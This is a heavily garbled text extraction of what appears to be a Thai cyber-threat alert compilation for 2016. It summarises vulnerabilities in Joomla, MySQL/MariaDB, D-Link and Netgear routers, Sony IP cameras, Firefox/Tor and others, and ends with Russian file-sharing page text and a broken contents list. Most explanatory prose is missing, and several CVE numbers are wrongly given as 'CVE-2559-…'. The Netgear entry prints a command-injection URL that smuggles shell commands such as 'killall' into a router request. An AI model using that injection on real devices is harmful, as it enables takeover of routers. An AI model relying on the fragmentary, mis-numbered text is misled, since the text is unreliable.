Joomla! users/?task=user.register
25,000

Sucuri
Joomla!
Joomla!
: 31/10/2559
: Softpedia <http://thcert.co/HpFnw5>,
Sucuri <http://thcert.co/p0l5Ru>
454
MySQL, MariaDB
PerconaDB
(CVE-2559-6663, CVE-2559-6664)
- Percona Server
Legal Hackers 5.5.51-38.2, 5.6.32-78-1, 5.7.14-8
MySQL, MariaDB PerconaDB
(CVE-2559-6663 - Percona XtraDB Cluster
CVE-2559-6664) 5.6.32-25.17, 5.7.14-26.17,
race condition root privilege 5.5.41-37.0
escalation MySQL PerconaDB
2
MariaDB
( mysql) CVE-2559-6663
CVE-2559-6664

( root)

- MySQL 5.5.51, 5.6.32,
5.7.14

- MariaDB 5.5.52,
10.1.18, 10.0.28
: 03/11/2559
: Threatpost <http://thcert.co/bdRdyS>,
Legal Hackers <http://thcert.co/sHA1i3>,
Legal Hackers <http://thcert.co/gGfbuC>
CYBER THREATS 455
2016
D-Link DIR
remote administration
CERT 818L(W), DIR-895L, DIR-890L, DIR-885L,

D-Link DIR-880L DIR-868L

buffer overflow
SOAP
Home Network Automation

Protocol (HNAP)
remote administration (

D-Link http://
root
CVE-2559-6563 www.dlink.com/uk/en/support/faq/
cameras-and-surveillance/mydlink/
settings/router/how-do-i-enable-
DIR-823, DIR-822, DIR- remote-management-on-my-dir-
series-router)
: 08/11/2559
: CERT <http://thcert.co/YIT85u>,
The Register <http://thcert.co/obzaU6>
456
MacBook Pro 2016 Touchbar SIP

()
Apple
OS X El Capitan (10.11) Apple
Apple System
Integrity Protection (SIP)
MacBook Pro
root SIP
(
SIP https:// 1.
support.apple.com/th-th/HT204899) 2. CMD + R
MacBook Recovery Mode
Pro 2016 Touchbar ( 13
15 ) macOS 3. Utilities
SIP
Function SIP 4. Terminal

5. csrutil enable
macOS ( )
SIP
6.
Terminal csrutil status
SIP
System Integrity
Protection status: disabled
SIP
: 18/11/2559
: MacRumors <http://thcert.co/UEzj4i>,
iMore <http://thcert.co/RWzcgY>
CYBER THREATS 457
2016
Netis 15,000
2
2557 Trend Micro botnet

backdoor
Netis
UDP 53413
(
: IoT)
Netis

Trend Micro
2559 2

- 2559
57
Shadow
Server

Netis 15,000
: 25/11/2559
: Bleeping Computer <http://thcert.co/kyQT3f>,
Trend Micro <http://thcert.co/qx5eYS>,
Shadow Server <http://thcert.co/9vl21S>
458
0-day Firefox
Tor Browser
Firefox
0-day Mozilla
Firefox JavaScript Firefox Tor
Windows Browser JavaScript ()

FBI : Mozilla
Tor
2556 Firefox 50.0.2 Tor Browser 6.0.7

Firefox 41
50 Windows
Tor Browser

Tor
Firefox 45 ESR

: 30/11/2559
: Ars Technica <http://thcert.co/fr6vi4>,
Tor Project <http://thcert.co/Ydf2qi>
CYBER THREATS 459
2016
(pacemaker)

(
http://www.ns.mahidol. 5
ac.th/english/th/departments/MN/
th/med-km55-1.html)

10

: 02/12/2559
: The Register <http://thcert.co/RcwPvj>,
<http://thcert.co/CFSfX6>
460
Sony
80
6 2559 Sony
SEC Consult

(IP Camera)
Sony 80 https://www.sec-consult.com/
admin root fxdata/seccons/prod/temedia/adviso-
ries_txt/20161206-0_Sony_IPELA_En-
gine_IP_Cameras_Backdoors_v10.txt

: 08/12/2559
: Threatpost <http://thcert.co/7ploSh>,
The Register <http://thcert.co/UjyWUP>
CYBER THREATS 461
2016
Netgear

Netgear
Netgear R6400, R7000 R8000
command Netgear
injection

http://<router_IP>/cgi-bin/;kil-
lall$IFShttpd
http://<router_IP>/
cgi-bin/;COMMAND
root
: 13/12/2559
: US-CERT <http://thcert.co/vGwI7s>,
Bas <http://thcert.co/f8hqhI>,
462
! Joomla!
3.6.4 admin
Joomla! Joomla!
3.6.5

CVE-2559-9838
Joomla!
1.6.0 3.6.4

PHP .php6, .php7, .phtml
.phpt web
shell CVE-2559-
9836

: 19/12/2559
: Bleeping Computer <http://thcert.co/0hyxfA>,
Joomla! <http://thcert.co/6ncgGE>
CYBER THREATS 463
2016
Netgear R6250,
R6400, R7000 R8000
US-CERT
R6250, R6400, R7000 R8000
Netgear (R6700,
19 2559 R6900, R7100LG, R7300DST, R7900,
Netgear D6220, D6400)
(beta)
Netgear

: 20/12/2559
: Graham Cluley <http://thcert.co/SjHh1w>,
Netgear <http://thcert.co/C3gPxC>
464
Netgear ZyXEL

ZyXEL P660HN-T
Billion 5200W-T 4
Netgear ZyXEL Remote Code
Execution

4
ISP

Netgear WNR2000
3

(Remote Administration)

Shodan
10,000

3

: 27/12/2559
: Bleeping Computer <http://thcert.co/4ZiFs1>,
SecList <http://thcert.co/RLIz6t>
CYBER THREATS 465
2016

(,
Awareness ) MasterCard

(
,
Fraud )

(
Incident
, )
SWIFT
12

Law & Policy

(
, ,
Malware )
CTB-Locker

(,
Privacy )
QQ Browser

Research &
Education
FBI
Statistics 2.3 2

Vulnerability
D-Link
468

Cyber Threat Alerts 2016

Загружено:

Сведения о документе

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Cyber Threat Alerts 2016

Загружено:

Авторское право:

Доступные форматы

2

Ministry of Digital Economy and Society

Lenovo Windows Server 2559 November

Internet of Things (IoT)

DDoS ....................................................................... 275

Google Account............................................... 286

FBI Apple iOS

Research & Education

124,000 579 Gbps....................................................... 371

Vulnerability & Patch

Samsung KNOX Samsung Galaxy

Lenovo, HP Gigabyte........................................................ 432

Apple ............................................................................................ 456

iPad Pro 9.7 iOS 9.3.2

Palo Alto Networks Android 2.8

2559 Mobile Connect

LINE 500 Free

Toyota Lexus Toyota Lexus 2557

Marriot Hyatt 8,000

macOS 10.12 (Sierra)

OVH DDoS 1.1 Tbps

1. https:// 4. Sign-in preferences

Law & Policy

David Levin Troy Hunt

2558 FBI NIT

Kickass Torrent Apple,

Daniel Traeger spreadsheet

NIST Homeland Security

Porn clicker Google Play

Android Flash Player

Google Play Store 100

Dr.Web Dr.Web Google

Internet of Things (IoT)

Institute for Critical

Intel Security Mobile Research

Google Play Store

Pathe Windows 25% Internet

Duo Labs Asus LiveUpdate

iOS App Store

True Lenovo P1m

Palo Alto Networks Palo Alto Networks

FossHub (http://www.fosshub. MBR

Google Play Store

Wildfire No More Ransom

Locky .zepto ( Zepto

DressCode Google Play Store

Guide for Pokemon GO Play Store

Xiny Android Play Store

Microsoft Office macro Symantec

Malware Must Die

Svpeng Google Chrome

Dr.Web 7 MID, Explay Imperium 8, Perfeo

Lenovo A319, Lenovo A6000, Lenovo

Super Mario Run Android

FBI Apple iOS

Home Depot 19.5

Google, Yahoo, Microsoft 272

2555 LinkedIn LinkedIn

Flash Keyboard Play Store

Catholic Health Care

Maxthon Browser Maxthon Browser

Minecraft World Map

31 2559 Dropbox Dropbox

Research & Education